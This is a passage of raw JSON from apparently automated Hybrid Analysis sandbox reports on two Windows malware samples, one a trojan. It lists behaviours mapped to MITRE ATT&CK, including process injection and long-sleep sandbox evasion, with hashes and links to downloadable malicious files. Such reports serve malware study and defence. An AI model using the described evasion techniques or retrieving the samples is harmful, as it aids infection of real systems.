\"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" was detected as \"Microsoft visual C++ 8\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\DBGHELP.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe.Local\\\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to access non-existent file \"C:\\B47B40AEAF31F4342D50BE9CB114CCDCE5903DB6C6AA84C73B3CB69A50BEA774.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-85", "type": 6, "relevance": 3, "name": "Queues an Asynchronous Procedure Call (APC) in a remote process (injection)", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"NtQueueApcThread\" (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe.Local\\\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\COMCTL32.dll\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" trying to touch file \"C:\\b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6E4C0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"GetLocaleInfoA\" with parameter \"1024\" - (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"IsWow64Process\" with parameter \"5988\" - (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has resource with unusual entropy \"CORJC:7.836543055154563\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"FlsAlloc\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"GetActiveWindow\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: USER32.DLL)\n Found string \"GetDateFormatEx\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNEL32.DLL)\n Found string \"GetEnabledXStateFeatures\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNEL32.DLL)\n Found string \"GetLastActivePopup\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: USER32.DLL)\n Found string \"GetLocaleInfoEx\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"GetProcessWindowStation\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: USER32.DLL)\n Found string \"GetTimeFormatEx\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNEL32.DLL)\n Found string \"GetUserDefaultLocaleName\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"GetUserObjectInformationW\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: USER32.DLL)\n Found string \"GetXStateFeaturesMask\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNEL32.DLL)\n Found string \"IsValidLocaleName\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"LCIDToLocaleName\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"LocaleNameToLCID\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)\n Found string \"LocateXStateFeature\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNEL32.DLL)\n Found string \"MessageBoxW\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: USER32.DLL)\n Found string \"SetThreadStackGuarantee\" (Source: b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774, API is part of module: KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-98", "relevance": 5, "name": "PE files contains large number of export functions (more than 100)", "description": "b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774 contains more than 100 export function", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has section name .text with entropy \"6.64437757074086\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has section name .rsrc with entropy \"7.81550597298305\"\n \"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774\" has section name .reloc with entropy \"6.66675507256422\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" sleeping for \"1097794852\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" opens a process \"C:\\b47b40aeaf31f4342d50be9cb114ccdce5903db6c6aa84c73b3cb69a50bea774.exe\" (UID: 00000000-00005988)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663
https://hybrid-analysis.com/sample/870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663
Hybrid Analysis - Um_unhooking
{"size": 11841024, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663", "sha256": "870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 7, "total_processes": 9, "total_signatures": 246, "extracted_files": [{"name": "qoxyhdso.exe", "file_path": "%TEMP%\\qoxyhdso.exe", "file_size": 5242368, "sha256": "92f7854b359904488f46e390d3cb70d980a9528b90a05625654faa4dc49d8bdb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe (PID: 5996)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "qoxyhdso.exe.67EE4A71.bin", "file_size": 14446080, "sha256": "8cb23a302e6571c75febac2a56906904a476c0a5164fa9aa320ada22af518ab9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279735, "sha256": "5e5f1f9db1ab0af9d65e6dccc4e357da67676a8b7e3fa390d27213d1ef8716ac", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67EE53F7.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00005996", "name": 